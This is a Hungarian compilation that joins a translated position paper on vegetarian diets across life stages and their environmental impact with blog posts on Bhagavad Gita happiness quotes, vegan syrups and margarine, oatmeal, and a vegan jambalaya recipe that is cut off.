VEGETÁRIÁNUS ÉTREND AZ ÉLET MINDEN SZAKASZÁBAN A jól megtervezett vegán, lakto-vegetáriánus és lakto-ovo-vegetáriánus étrend megfelelő, kielégíti a táplálkozási szükségleteket és normális növekedést biztosít az élet minden szakaszában, beleértve a terhességet és a szoptatást, a csecsemőkort, a gyermekkort, a serdülőkort, az idősebb felnőttkort és az élsportoló életmódot is. Várandósság és szoptatás Kisebb kutatások azt mutatják, hogy ahol elegendő élelmiszer van, ott a vegetáriánus nők terhességének kimenetele, például a születési súly és a terhesség időtartama hasonló a nem vegetáriánusokéhoz.7,86,87 Egy tanulmány szerint a vegetáriánus táplálkozás a várandósság első trimeszterében csökkentette a hasi elhízás kockázatát.88 A sok növényi táplálékot tartalmazó étrend a várandós nők esetében csökkentheti a terhesség szövődményeinek, például a terhességi cukorbetegség kialakulásának kockázatát.88,89 A Táplálkozási és Dietetikai Akadémia állásfoglalása és gyakorlati útmutatója, a ,,Táplálkozás és életmód az egészséges terhességért90,91 megfelelő útmutatást ad a várandós vegetáriánusok számára. Különösen figyelni kell a vas, a cink, a B12-vitamin és az EPA/DHA megfelelő szintjére.87,89 Az étrendi döntéstől függően a várandós vegetáriánusok vasbevitele nagyobb lehet, mint a nem vegetáriánusoké, és nagyobb valószínűséggel használnak vas tartalmú táplálék kiegészítőket.92 Az elégtelen vasbevitel lehetősége és a vashiány ártalmas hatásai miatt ajánlatos alacsony dózisú (30 mg) étrendkiegészítő vasat szedni a terhesség alatt.93 Az ajánlott vasmennyiség bevihető prenatális (terhességi) táplálékkiegészítővel, külön vaskészítménnyel vagy ezek kombinációjával is. Nincs elegendő bizonyíték arra, hogy a terhesség alatt a vegetáriánusok cink bevitele és cink státusza különbözne a nem vegetáriánusoktól.87,89 A várandósság alatt megnövekedett cinkigény, illetve a gabonák és hüvelyesek magas fitáttartalma miatt a cinkbevitel növelése és felszívódást javító élelmiszer-előkészítő technikák használata javasolható.7,8,29 Várandós és szoptató vegetáriánusoknak rendszeres és megfelelő étrendi és/vagy kiegészítő B12-vitamin-forrásokra van szükségük 7,8,89,91 A vegetáriánus nők gyermekeinek alacsonyabb a plazma-DHA-koncentrációja, és a vegetáriánus anyatej DHA-szintje is alacsonyabb.7,8 Ezek az n-3 zsírsavak bizonyos mértékig szintetizálhatók ?-linolénsavból, de a konverziós arány alacsony (bár némileg fokozott a várandósság alatt).8,89 Várandós és szoptató vegetáriánusok számára előnyös lehet a mikroalgákból kivont EPA és a DHA közvetlen bevitele.8,91 Csecsemők, gyermekek és serdülők Az első 6 hónapban a kizárólagos szoptatás az ajánlott táplálási mód.94 Ha ez nem lehetséges, akkor a kereskedelemben kapható csecsemőtápszer legyen az elsődleges élelmiszer az első évben. A kiegészítő élelmiszereknek energiában, fehérjében, vasban és cinkben gazdagnak kell lenniük, tartalmazhatnak hummuszt, tofut, jól megfőzött hüvelyeseket és avokádópürét.8 Telített zsír, dúsított szójatej vagy állati tej fogyasztása elkezdhető 1 éves korban, ha a gyermek normálisan fejlődik és különféle ételeket eszik.95 A vegetáriánus gyermekek és tizenévesek körében kisebb a túlsúly és az elhízás veszélye a nem vegetáriánus társaikhoz viszonyítva. Normál BMI-értékű gyermekek és fiatalok esetében valószínűbb, hogy felnőttkorukban is a normál BMI-tartományon belül lesznek, ami jelentősen csökkenti a betegségek kockázatát.96 A vegetáriánus étrend további előnye, hogy gyermekkorban és serdülőkorban nagyobb gyümölcs- és zöldségfogyasztással jár, kevesebb édesség és sós rágcsálnivaló fogyasztás, valamint kevesebb telítettzsír-bevitel mellett.97 Ha a gyermekek a kiegyensúlyozott vegetáriánus étrendhez szoknak hozzá az élet kezdeti szakaszában, akkor egész életen át tartó egészséges szokásokat alakíthatnak ki.8 Az étkezési zavarok megjelenése serdülőkorban a legvalószínűbb. Az étkezési zavarok etiológiája összetett. A vegetáriánus vagy vegán étrend nem látszik növelni a táplálkozási rendellenességek kockázatát, bár azok, akiknél már kialakult valamilyen étkezési zavar, használhatják ezt a táplálkozási formát a táplálékbevitel korlátozására.7,8 A fiatal vegetáriánusok megfelelő étrendjének tervezésekor a következő tápanyagokra kell nagy figyelmet fordítani: vas, cink, B12-vitamin, illetve egyes esetekben kalcium és D-vitamin. A vegetáriánus gyermekek fehérjebevitele általában eléri vagy meghaladja az ajánlásokat.7 A vegán gyermekek fehérjeigénye kissé magasabb lehet, mint a nem vegán gyermekeké a fogyasztott fehérjék emészthetőségének és aminosav-összetételének különbségei miatt.7 Az ajánlott fehérjetöbblet vegán gyermekeknek 30-35% 1-2 éves korban, 20-30% 2-6 éves korban és 15-20% 6 év felett.7,95 Bár az étrendi tényezők korlátozhatják a vas és a cink bevitelét, a vas-, illetve cinkhiány nagyon ritka a fejlett országokban élő vegetáriánus gyermekeknél.98 A gyermekek vas- és cinkszintjét szigorúan növényi alapú étrend esetén figyelemmel kell kísérni. Ilyen esetekben szükség lehet táplálékkiegészítők használatára.98 A vegán csecsemők és gyermekek B12-vitamin-bevitelét figyelemmel kell követni, értékelni kell, és szükség esetén B12-vitaminnal dúsított élelmiszereket és/vagy táplálékkiegészítőt kell alkalmazni a megfelelő bevitel biztosítására.7 Idősebb felnőttek Az idősebb vegetáriánusok tápanyagbevitele hasonlónak vagy jobbnak tűnik, mint az idősebb nem vegetáriánusoké,7 bár a múltbeli kutatások szerint alacsonyabb lehet a cinkbevitel és gyakoribb a vashiány a vegetáriánusok között.86,99 A kalóriaigény általában csökken a korral, míg néhány tápanyag iránt nő az igény, ezért fontos, hogy minden idős ember tápanyagban dús étrendet válasszon. Néhány adat arra utal, hogy a fehérjehasznosítás hatékonysága csökken az öregedéssel, ami magasabb fehérjebeviteli igényt jelent.100 Így fontos az idősebb vegetáriánusok és vegánok számára, hogy az étrendjük fehérjében gazdag élelmiszereket tartalmazzon, például hüvelyeseket és szóját. A húshelyettesítők hasznosak lehetnek mint fehérjeforrások. Idősebb emberek a D-vitamint kevésbé hatékonyan szintetizálják, és valószínűleg kiegészítő vitamin készítményt igényelnek, különösen, ha kevés a napsütés.35 Az idősebbek számára ajánlott magasabb kalciumbevitel könnyen megvalósítható kalciummal dúsított élelmiszerek, például növényi tejek fogyasztásával. A B6-vitamin-igény a kor előrehaladtával növekszik, és magasabb lehet, mint az aktuális ajánlott napi beviteli érték (RDA). A sorvadásos gyomorhurut gyakori az 50 év felettiek körében, és ez ronthatja a B12-vitamin felszívódását az állati termékekből. Ezért sok idős embernek, étrendtől függetlenül, szüksége van B12-vitamin-tartalmú táplálékkiegészítő szedésére. KÖRNYEZETI HATÁSOK A növényi alapú étrend környezetkímélőbb és fenntarthatóbb, mint az állati termékekben gazdag étrend, mert kevesebb természeti erőforrást használ, és jelentősen kevesebb környezetkárosítással jár.101,102,103,104,105 A jelenleg mindenütt a világon általános, húsban és tejtermékekben gazdag táplálkozás egyesek szerint nem fenntartható.101,103,105 Az Amerikai Táplálkozási Irányelvek Tudományos Tanácsa által végzett módszeres vizsgálat azt támasztja alá, hogy a növényi élelmiszerekben gazdag, de állati termékekben szegény (például a vegetáriánus) étrend kevesebb környezeti kárt okoz.106 Sok kutató szerint az állati termékek fogyasztásának jelentős csökkentése a legfontosabb tényezők egyike az éghajlatváltozás visszafordításában.105 www.vndpg.org A Vegetarian Nutrition Dietetic Practice Group (VNDPG) (Vegetáriánus Táplálkozás Dietetikai Gyakorlata Csoport). A csoport tagjai hozzáférhetnek a vegetáriánus táplálkozással kapcsolatos professzionális információkhoz, a dietetikusok számára készített forrásanyagokhoz, valamint negyedéves hírlevelet is kapnak. www.vegetariannutrition.net A VNDPG felhasználói weboldala. Blogot tartalmaz a megbízható vegetáriánus táplálkozásról és hozzáférést biztosít a dietetikai forrásokhoz az ügyfelek részére. www.vrg.org A Vegetáriánus Erőforrás Csoport táplálkozási információkat, recepteket, étkezési terveket és ajánlott cikkeket kínál a vegetáriánus táplálkozásról. www.PCRM.org A ,,Orvosok Bizottsága a Felelős Orvostudományért innovatív programokkal és ajánlatokkal támogatja a megelőző orvoslást és ingyenes oktatóanyagot biztosít a felhasználóknak. www.veganhealth.org A weboldal hiteles ajánlásokat tartalmaz a növényi alapú étrend táplálkozási jellemzőiről. www.nutritionfacts.org Ez a weboldal rövid, ajánlásokat tartalmazó videoklipeket és cikkeket tartalmaz a vegetáriánus táplálkozás számos vonatkozásában. www.vegweb.com A VegWeb vegetáriánus recepteket, közösségeket és blogokat kínál. www.vegetarian-nutrition.info A Vegetarian Nutrition Info aktuális cikkeket, forrásokat és híreket kínál. 2. ábra: Táplálkozási szakemberek és pácienseik számára ajánlott weboldalak vegetáriánus táplálkozás, élelmiszerek és a kapcsolódó témák tekintetében. Számos webhely kiváló minőségű oktatási anyagokat tartalmaz, amelyekre a dietetikusok, táplálkozási szakértők és más egészségügyi szakemberek is támaszkodhatnak. Ezek az oldalak támogatják a betegek vagy ügyfelek oktatását a vegetáriánus táplálkozásról az élet minden szakaszában, a kiemelten fontos tápanyagokra, étkezési tervekre és a nem vegetáriánus összetevők növényi alapú helyettesítésére vonatkozóan. Összehasonlítva a mindenevő étrenddel, a vegetáriánusok élelmezése kevesebb víz és fosszilis tüzelőanyag felhasználását igényli, kevesebb rovarirtót és műtrágyát használ.107 Ha a marhahúst babbal helyettesítenénk, jelentősen csökkenne az emberiség ökológiai lábnyoma: 1 kg fehérje előállítása vesebabból 18-szor kevesebb termőföldet, 10-szer kevesebb vizet, 9-szer kevesebb üzemanyagot, 12-szer kevesebb műtrágyát és egytized annyi rovarirtót igényel, mint ha ugyanennyi fehérjét marhahúsból állítanánk elő.108 Emellett a marhahústermelés jelentősen több trágyát termel, mint bármely más állati eredetű élelmiszer előállítása.108 Az Amerikai Környezetvédelmi Ügynökség szerint az Egyesült Államokban a folyók és tavak vízszennyezésének mintegy 70%-a az állattenyésztő telepekről származik.109 Az állattenyésztés talajromlással, levegőszennyezéssel, a biológiai sokszínűség csökkenésével és globális felmelegedéssel jár együtt.104,110 A húsipar jelentősen hozzájárul az antropogén szén-dioxid, metán és dinitrogén-oxid termeléshez.101,103,111 Kétszáztíz általánosan elterjedt élelmiszer figyelembevételével végzett számítás azt mutatja, hogy a vegetáriánus étrend 29%-kal;112 míg a vegán (növényi alapú) étrend több mint 50%-kal kevesebb üvegház hatású gáz termelésével járhat, mint a nem vegetáriánus étrend.102 Egy nemrégiben készült tanulmány megállapította, hogy az állattenyésztők számára kidolgozott új technológiák segítségével is csak 9%-kal csökkent az üvegház hatású gázok kibocsátása az állattenyésztési és húsipari folyamatok során.113 A szerzők leszögezték: az üvegház hatású gázok kibocsátását csökkenteni kell a globális hőmérsékleti cél eléréséhez, és ez ,,hosszú távon súlyos következményekkel jár az állati eredetű élelmiszerek fogyasztására az egész világon.113 Mások felvetették, hogy az állatipar termelésének csökkentése nagyobb lehetőség az üvegház hatású gázok kibocsátásának csökkentésére, mint ,,a technológiai mérséklés vagy a termelékenység növelése.105 Az állattenyésztésben hozamnövelésre, illetve a betegségek megelőzésére és kezelésére használt antibiotikumok antibiotikumokkal szemben rezisztens baktériumok kifejlődéséhez vezettek. Az antibiotikum rezisztencia az állatokból átkerülhet az emberekre is az élelmiszer fogyasztásával, és ez már most is súlyos közegészségügyi problémát okoz. Olyan betegségeket idéz elő, amelyeket nehéz kezelni, s növeli a betegségek előfordulását (morbiditás), a halálozást (mortalitás) és az egészségügy költségeit.105,114 A DIETETIKUS ÉS A TÁPLÁLKOZÁSI TANÁCSADÓ SZEREPE, FELELŐSSÉGE ÉS FORRÁSAI A vegán és a vegetáriánus táplálkozás jelentős egészségügyi előnyökkel járhat a nem vegetáriánus étrendekkel szemben. Az energiabevitel egyensúlyban tartása; a kiegyensúlyozott tápanyagbevitel és a különböző zöldségek, hüvelyesek, gyümölcsök, teljes kiőrlésű gabonák, diófélék és magvak átgondolt fogyasztása maximalizálhatja ezeket az előnyöket. A dietetikusok és táplálkozási tanácsadók kulcsszerepet játszhatnak abban, hogy a vegetáriánusok megfelelő oktatást kapjanak az egyes tápanyagforrásokkal és az egyes élelmiszerek bizonyos krónikus betegségek kezelésében játszott szerepével kapcsolatban. A hatékony tanácsadáshoz a dietetikusnak és a táplálkozási tanácsadónak megfelelő ismeretekkel kell rendelkeznie és hozzá kell férnie az oktatási anyagokhoz. Az Egyesült Államok Mezőgazdasági Minisztériuma által létrehozott ,,ChooseMyPlate életviteli program elérhető az interneten és tartalmaz lakto-ovo vegetáriánus és vegán menüt is. A fehérje táplálékcsoportban megjelennek a babok és borsók, a diófélék és magvak, valamint a szójatermékek, csakúgy, mint a tojás az ovo-vegetáriánusok számára.115 A vitaminnal dúsított szójatej a tehéntej alternatívájaként szerepel, és kalciumforrásként a kalciummal dúsított élelmiszerek (gyümölcslevek, gabonafélék, kenyér, rizstej és mandulatej), valamint a kelkáposzta választhatók.116,117 Az interneten rendelkezésre állnak az Egyesült Államok Mezőgazdasági Minisztériumának ,,ChooseMyPlate programja alapján összeállított vegán táplálkozási útmutatók, amelyek tartalmazzák a megfelelő kalcium-, B12-vitamin, jód-, és n-3 zsírsav forrásokat (www.vrg.org/nutshell/MyVeganPlate.pdf; www.becomingvegan.ca/food-guide; www.theveganrd.com/food-guide-for-vegans), és hiteles információ áll rendelkezésre a dietetikusok és ügyfeleik részére a Vegetarian Nutrition Dietetic Practice Group (Vegetáriánus Táplálkozás Dietetikai Gyakorlata Csoport) honlapján (www.vegetariannutrition.net). Ezek az információk rendszeresen frissítésre kerülnek és tájékoztatást nyújtanak a növényi étrendben kritikus tápanyagokról, az életciklus figyelembevételével. A 2. ábra: olyan hasznos weboldalakat sorol fel, amelyek népszerűsítik és ösztönzik a bizonyítottan megfelelő és megbízható étrendi választásokat mind a dietetikus, mind az ügyfelei számára. További ajánlások találhatók a bizonyítékelemzési könyvtárban, amely ingyenesen elérhető a Táplálkozási és Dietetikai Akadémia minden tagja számára. Minden dietetikusnak etikai kötelezettsége, hogy tiszteletben tartsa a vegetáriánus étrendet épp úgy, mint minden más táplálkozási mintát. KÖVETKEZTETÉSEK A növényi alapú étrendek elfogadottsága és az irántuk megnyilvánuló érdeklődés növekedni fog az Egyesült Államokban és a világ más részein egyaránt, ahogyan a kormányzati szervek és az egészségügyi/táplálkozási szervezetek ajánlják a növényi élelmiszerek rendszeres fogyasztását. A bőséges piaci választék megkönnyíti a növényi alapú étrend követését. A jól összeállított vegetáriánus étrend megfelelő tápanyagbevitelt biztosít az életciklus minden szakaszában, és hasznos lehet bizonyos krónikus betegségek kezelésében. A teljes tápanyagbevitel az Alternatív Egészséges Étkezési Index értékelése szerint általában jobb a vegetáriánus és vegán étrendek mellett, mint a mindenevőknél. Bár egynémely vegetáriánus étrend bizonyos mértékig szegény lehet egyes tápanyagokban, például kalciumban és B12-vitaminban, ezt megfelelő módon ellensúlyozhatja a gondos tervezés. A vegetáriánus étrend a nem vegetáriánus étrenddel szemben védelmet nyújthat számos krónikus betegség, például szívbetegségek, a magas vérnyomás, a 2-es típusú cukorbetegség, az elhízás és néhány daganatos betegség ellen. Továbbá a vegetáriánus étrend gazdaságosabban használja a természeti erőforrásokat, és kevesebb környezetrombolást okoz. Ma már nagy oktatási erőforrások állnak rendelkezésre, a dietetikusok és a táplálkozási tanácsadók egyre több naprakész információval segíthetik vegetáriánus ügyfeleiket, hogy tájékozott döntéseket hozzanak a táplálkozási egészségükről. ÁLLÁSFOGLALÁS A Táplálkozási és Dietetikai Akadémia úgy foglal állást, hogy a megfelelően összeállított vegetáriánus étrend, beleértve a vegán étrendet is, egészséges, tápanyag bevitel szempontjából megfelelő, és egészségügyileg előnyös lehet bizonyos betegségek megelőzésében és kezelésében. Ezek az étrendek megfelelőek az emberi életciklus minden szakaszában, beleértve a terhességet, a szoptatást, a kisgyermekkort, a gyermekkort, a serdülőkort, az idősebb felnőttkort és a sportoló életmódot is. A növényi alapú étrend környezetkímélőbb, mint az állati termékekben gazdag étrend, mivel kevesebb természeti erőforrást használ és sokkal kevesebb környezeti kárt okoz. A Táplálkozási és Dietetikai Akadémia jelen állásfoglalását 1987. október 18-án fogadta el a Delegates House Leadership Team (Képviselők Házának Vezetői Csoportja), és megerősítette a következő időpontokban: 1992. szeptember 12.; 1996. szeptember 6.; 2000. június 22.; 2006. június 11.; és 2012. március 19. Ez az állásfoglalás 2021. december 31-ig érvényes. Az állásfoglalások nem használhatók termékek vagy szolgáltatások jóváhagyására. Az állásfoglalás egyes részeinek felhasználására vagy teljes közzétételére vonatkozó összes kérést az Akadémiára kell irányítani a journal@eatright.org címre. Szerzők: Vesanto Melina, MS, RD (tanácsadó, Vancouver, Kanada); Winston Craig, PhD, MPH, RD (Andrews Egyetem, Berrien Springs, MI); Susan Levin, MS, RD, CSSD (orvosi bizottság a felelős orvoshoz, Washington, DC). LEHETSÉGES ÖSSZEFÉRHETETLENSÉGI NYILATKOZAT A szerzők nem jelentettek potenciális összeférhetetlenséget. FINANSZÍROZÁS/TÁMOGATÁS Nincs közzétehető finanszírozás. Bírálók: Éhezés és Környezetvédelmi Táplálkozás Gyakorlati Dietetikai Csoportja (Melissa Altman-Traub, MS, RDN, LDN, Phila-delphia Közösségi Főiskola, Philadelphia, PA); Catherine Conway, MS, RDN, CDN, CDE (YAI / Fogyatékkal élők Országos Intézete, New York, New York); Sharon Denny, MS, RD (Akadémia Tudásközpont, Chicago, IL); Sarah Picklo Halabu, RDN, LDN, CDE (Akadémiai kiadványok és források, Chicago, IL); D. Enette Larson-Meyer, PhD, RD, CSSD (Wyoming Egyetem, Laramie, WY); Mark E. Rifkin, MS, RD (Akadémiai Politikai Kezdeményezések & Tanácsadás, Washington, DC); Tamara Schryver, PhD, MS, RD (The Schwan Food Company, Minneapolis, MN); Alison Steiber, PhD, RD (Academy Research, Nemzetközi és Tudományos ügyek, Chicago, IL); Vegetáriánus Táplálkozást Gyakorló Dietetikusok Csoportja (John Westerdahl, PhD, MPH, RD, CNS, FAND, Bragg Egészségügyi Alapítvány, Santa Barbara, CA). Akadémiai Állásfoglalás Bizottsági Munkacsoport: Mary Ellen E. Posthauer, RDN, CD, LD, FAND (szék) (MEP Egészségügyi Táplálkozási Szolgáltatások, Inc., Evansville, IN); Ainsley Malone, MS, RD, LD, CNSC, FAND, FASPEN (Parenterális és Enterális Táplálkozás Amerikai Közössége, New Albany, OH); Joan Sabate, MD, DrPH (tartalom tanácsadó) (Loma Linda Egyetem, Loma Linda, CA). A szerzők megköszönik a bírálóknak a számos konstruktív megjegyzést és javaslatot. A bírálókat nem kérték, hogy támogassák ezt az álláspontot vagy a támogató dokumentumot. Referenciák - 1.Stahler C. How often do Americans eat vegetarian meals? And how many adults in the US are vegetarian? The Vegetarian Resource Group website. http://www. vrg.org/nutshell/Polls/2016_adults_veg. htm. Accessed June 23, 2016. - 2. Hoek AC, Luning PA, Weijzen P, Engels W, Kok FJ, de Graaf C. Replace- ment of meat by meat substitutes. A survey on person- and product-related factors in consumer acceptance. Appe- tite. 2011;56(3):662-673. - 3.American Institute for Cancer Research. Recommendations for cancer preven-tion. http://www.aicr.org/reduce-your-cancer-risk/recommendations-for-cancer prevention/recommendations_04_ plant_based.html?gclid 1/4 CJ6O7dpboCFcid4AodhkMAIA. Accessed June 23, 2016. - 4.US Department of Agriculture, US Department of Health and Human Ser-vices. 2015-2020 Dietary Guidelines for Americans. 8th ed. Washington, DC: US Government Printing Office; 2015. http://health.gov/dietaryguidelines/2015. Accessed June 23, 2016. - 5.US Department of Agriculture. Super-Tracker. https://www.supertracker.usda. gov/default.aspx. Accessed June 23, 2016. - 6.Institute of Medicine. Dietary reference intakes for energy, carbohydrate, fiber, fat, fatty acids, cholesterol, protein, and amino acids. http://www.nap.edu/ download.php?record_id 1/4 10490. Accessed June 23, 2016. - 7.Mangels R, Messina V, Messina M. The Dietitians Guide to Vegetarian Diets. 3rd ed. Sudbury, MA: Jones and Bartlett; 2011. - 8.Davis B, Melina V. Becoming Vegan: Comprehensive Edition. Summertown, TN: Book Publishing Co; 2014. - 9.Messina V. Nutritional and health bene- fits of dried beans. Am J Clin Nutr. 2014;100(suppl 1):437S-442S. - 10.Saunders AV, Davis BC, Garg ML. Omega- 3 polyunsaturated fatty acids and vege- tarian diets. Med J Aust. 2013;199 (4 suppl):S22-S26. - 11. Sanders TA. DHA status of vegetarians. Prostaglandins Leukot Essent Fatty Acids. 2009;81(2-3):137-141. - 12. Sarter B, Kelsey KS, Schwartz TA, et al. Blood docosahexaenoic acid and eicosa- pentaenoic acid in vegans: Associations with age and gender and effects of an algal-derived omega-3 fatty acid sup- plement. Clin Nutr. 2015;34(2):212-218. - 13.Gibson RA, Muhlhausler B, Makrides M. Conversion of linoleic acid and alpha- linolenic acid to long-chain poly- unsaturated fatty acids (LCPUFAs), with a focus on pregnancy, lactation and the first 2 years of life. Matern Child Nutr. 2011;7(suppl 2):17-26. - 14. Rosell MS, Lloyd-Wright Z, Appleby PN, et al. Long-chain n-3 polyunsaturated fatty acids in plasma in British meat- eating, vegetarian, and vegan men. Am J Clin Nutr. 2005;82(2):327-334. - 15. Orlich MJ, Singh P
Bhagavad Gíta idézetek - boldogság
2019. március 4. Élj harmóniában
A boldogság nem valami külső körülményen függ. A boldogság belül, önmagunkban létezik, amikor tapasztaljuk valós belső lényünket, megtaláljuk a kapcsolatot a lelkünkkel...
Bhagavad Gíta idézetek - anyagi élvezetek
2019. február 18. Élj harmóniában
Mint mondják a boldogság belülről fakad... ezt jól látni egy kisbabán, aki csak ül a földön kinéz a fejéből és boldog, függetlenül attól, hogy milyen játékokkal veszik körül, milyen a ház amiben lakik, függetlenül mások elismerésétől, a pénztől, hatalomtól... A Harvard Egyetemen csináltak egy boldogság kutatást, amiből az derül ki, hogy Banglades nyomornegyedeiben a gyerekek boldogabbak, mint New York elit negyedeiben... A mai fogyasztói társadalom mindenkit arra ösztönöz, hogy fogyasszon még többet, mintha ettől majd boldogabb lenne és sajnos a fordítottja történik, egyre boldogtalanabbak az emberek. Mert ugyan az anyagi testet jóllakatják, de belül, lelkileg éheznek. Ennek a következményeként jönnek létre az addikciók - kávé függés, tv sorozat függés, alkohol, drog, cigaretta, vásárlás függés, Internet, számítógépes játék, evés, sportolás függés, társ függés és hosszasan sorolhatnánk... Az egyik addikcióból kijön valaki és azonnal behelyettesíti egy másikkal... és mindaddig additív lesz valaki, amíg nem kezd el a lelkével is foglalkozni... Az anyagi élvezetek múlandóak, kezdetük és végük van, ezért a belőlük jövő boldogságérzet is múlandó. Aki a lelki dolgok helyett, anyagi élvezetekben keresi a boldogságot, minduntalan boldogtalanságra van ítélve, mert az érzékek élvezetéből jövő boldogság el fog múlni.
Mézes-vajas kenyér helyett – rizsszirupos, margarinos kenyér
Ez nem egy recept bejegyzés, inkább arról szól, milyen szirupokat lehet venni méz helyett és hol kaphatóak, mitől lesz nem vegán egy margarin vagy egy kenyér. És persze nem utolsó sorban ez egy vegán reggeli ötlet. A szirupos-margarinos kenyér elkészítése nagyon egyszerű, megkenjük a kenyeret margarinnal, azt meglocsoljuk sziruppal. De az alapanyagok kiválasztása felvethet pár kérdést. Ne aggódj, nem annyira bonyolult, mint amilyen hosszú lett a cikk. A képen a világosabb színű szirup rizsből készült, simán megkentem margarinnal a kenyeret, és rányomtam a rizsszirupot. A sötétebb színű változat juharszirup. Óvodában úgy csinálták nekünk a “vajas-mézes” kenyeret, hogy összekeverték a mézet a margarinnal (gondolom, mert így nem csöpög és ragad annyira). A juharszirup hígabb, mint a rizsből készült társa, ezért ezzel próbáltam ki. Nem lehet teljesen simára keverni villával, de eléggé összeáll ahhoz, hogy fel tudtam kenni egy alapnak, és csurgattam még rá egy adag juharszirupot. Teljesen visszaadta az ovis emlékeket. Szirupok A méz nem vegán, erről itt írtunk. Jó helyettesítők a növényi szirupok. Az én kedvencem a rizsszirup, mert van valami tejszínes krémesség az ízében, miközben teljesen vegán, és Európában termeszthető alapanyagból készül. Az agavé szirup is finom, és rendkívül egészséges. Mivel többnyire Mexikóból származik, nagyobb az ökolábnyoma, mint a rizsszirupnak. A datolya szirup kevésbé elterjedt, de nagyon finom, mazsolára és karamellre emlékeztető íze van. A datolya közel-keleti gyümölcs. A kókusz szirup íze teljesen karamellás, egészen különleges. Ez előny és hátrány is egyben: ki lehet érezni az ételekből az ízét. Szintén távoli országok gyümölcse. A juharszirupot az amerikai filmekből mindenki ismeri, palacsintára locsolják literszám. Hígabb, mint a fenti szirupok. Füstös, kellemes íze van, nagyon finom. Szinte kizárólag Kanadából és az USÁból származik. Még sosem láttam boltban, de létezik a magyar almaszirup, mely nyilván kicsi ökolábnyomú alternatíva. Karamellás ízvilágért még választhatjuk a (szerintem kevésbé egészséges) nádmelaszt, azaz cukornád-szirupot. Margarinok Sajnos a margarinok többsége sem vegán. Ez itt nem a reklám helye, de az olcsóbbak közül a Liga margarin teljesen állati eredetű anyagoktól mentes, és a Rama is piacra dobta (elég drágán) a vegán margarinját. Más, reform üzletekben, vagy nagyáruházak reform részlegén kapható margarinok közt is találunk vegánt. Attól lesz nem vegán egy margarin, ha van benne – tejtermék (vaj, joghurt, író vagy írópor, laktóz stb.) – D3-vitamin (vagy lanolin) – állati zsiradék Fontos infó: a D2 vitamin növényi eredetű. A D3-vitamint (és a lanolint) viszont juhok gyapjából nyerik ki. Így a D2 vitamin vegán, de ha a D3-t látod a csomagoláson bármilyen terméknél, az sajnos juhok szenvedése árán került az ételbe. Tejsav vagy tejsavó: a tejsavat baktériumos erjesztéssel állítják elő, így vegán. A tejsavó azonban a tejnek az alkotóeleme, így nem vegán. Kenyérfélék A kenyérfélékben, pékárukban előfordulhat tej, tejpor, tejsavó, sajt, vaj (tejből készül!), tojás, tojáspor, állati zsíradék, tepertő, és persze az ízesített, töltött pékárukban még sok minden más. Szerencsére már minden kis- és nagyáruházban fel van tüntetve, ki van függesztve az allergéntáblázat, vagy rosszabb esetben a el lehet kérni az ügyfélszolgálattól. Vannak dolgok, amiket nem nagyon tudunk kivédeni, például az úgynevezett zsírsavak mono- és digliceridjeit, amit többnyire növényi alapanyagokból állítanak elő, de nem kizárható sajnos az állati zsír használata. Mindenki magának dönti el, hogy ez a kockázat belefér-e számára. Kenyeret gluténmentes változatban is vehetünk, vagy helyettesíthető puffasztott kukoricaszelettel (más néven abonettel). The post Mézes-vajas kenyér helyett – rizsszirupos, margarinos kenyér appeared first on VegaNinja.
Fullos zabkása édesszájúaknak, lekvárral, növényi joghurttal és gabonapehellyel – vegán recept
A zabkása azért jó reggeli, mert alapanyaga, a zab nagyon egészséges, hosszan eltartható a konyhaszekrényben, és rendkívül sokféleképpen lehet variálni. Ez a recept egy nagyon finom, viszonylag sok összetevős, de 10 perc alatt összedobható növényi joghurtos zabkása. Hozzávalók: 3-4 púpos evőkanál finomszemű zabpehely 1 teáskanál lenmag 1,5 deci forró víz 1 deci növényi tej (én rizstejet használtam) fél doboz gyümölcsös szójajoghurt 2 teáskanálnyi lekvár fél marék natúr kukoricapehely fél marék szabadon választott, ízesített gabonapehely fahéj gyömbér szerecsendió A zabpelyhet és a lenmagot a fűszerekkel összekeverjük, felöntjük a forró vagy legalábbis nagyon meleg vízzel, elkeverjük, és megvárjuk, hogy a zab magába szívja a vizet. Ráöntjük a növényi tejet, és újra elkeverjük. Ekkor mehet rá a vegán joghurt, a lekvár, és a ropogós gabonapelyhek. Kellemes érzés, ahogy a szilárd, ropogós összetevők felbukkannak a kásában, egy-egy falatban. Ízlés szerint még édesíthetjük. The post Fullos zabkása édesszájúaknak, lekvárral, növényi joghurttal és gabonapehellyel – vegán recept appeared first on VegaNinja.
Vegán jambalaya
2019. január 17. Vegasztrománia
A jambalaya (ejtsd: dzsámbálájá, becézve: dzsambi) egy eredetileg kreol származású rizses étel, amit alapvetően hússal, kolbásszal és alapvetően Louisianában készítenek. Újabban csak zöldségekkel és Budapesten is. Köszönhetem mindezt Lillának, a józsefvárosi Dagoba-bisztró főnökasszonyának, akivel nyár óta harmadállásban együtt dolgozom. Júliusban éreztem meg ennek a csoda ételnek az illatát a bisztróban, és kezdtem el Lillát kikérdezni a hogyanokról. Aztán belevetettem magam egy saját, vegán jambalaya kikísérletezésébe. Ez a a mai napig tart, de már meg tudok veletek osztani egy alap verziót. Ez az étel nálam felkerült a hétköznapi gyorsak közé, a paradicsomos spagetti mellé. Vegán jambalaya Hozzávalók: (6 főre) 2-3 ek olívaolaj 1 hagyma kockákra vágva 3 gerezd fokhagyma (minimum) szeletekre vágva (a minimumnál több reszelve) 1 sárgarépa meghámozva, kis kockákra vágva 1 szár angol zeller kis kockákra vágva 1/3 zöld kaliforniai paprika kis kockákra vágva 1/3 piros kaliforniai paprika kis kockákra vágva 1/3 sárga kaliforniai paprika kis kockákra vágva 400 g hámozott paradicsom konzerv összeturmixolva/ ugyanennyi paradicsom passata 1 közepes cukkini hosszában negyedekre és szeletekre vágva 250 g gomba negyedekre vágva 2 tk oregánó 1 tk kakukkfű 1 tk füstölt paprika 2 tk creol fűszerkeverék cayenne bors ízlés szerint (óvatosan adagoljuk, csíp!) 1 1/2 csésze jázmin rizs (jó minőségű, ez a másik lelke a fűszerezésen kívül) 4 csésze víz/zöldségalaplé 400 g vörösbab konzerv átöblítve, lecsepegtetve 1 csomag friss petrezselyem apróra vágva Elkészítés: Egy lábosban hevítsük fel az olívaolajat, és dobjuk rá a hagymát és a fokhagymát. Pirítsuk kb. 5 percig, időnként megkeverve. Adjuk hozzá a répát és a zellert, és pirítsuk további 3 percig. Adjuk hozzá a paprikákat, majd 1 perc múlva a cukkinit, gombát, a paradicsomkonzervet és a fűszereket. Sózzuk meg. Főzzük 3 percig, majd keverjük hozzá a rizst, és a 4 csésze vizet. Sózzuk meg. Fedjük le és alacsony lángon főzzük 10 percig. Ellenőrizzük 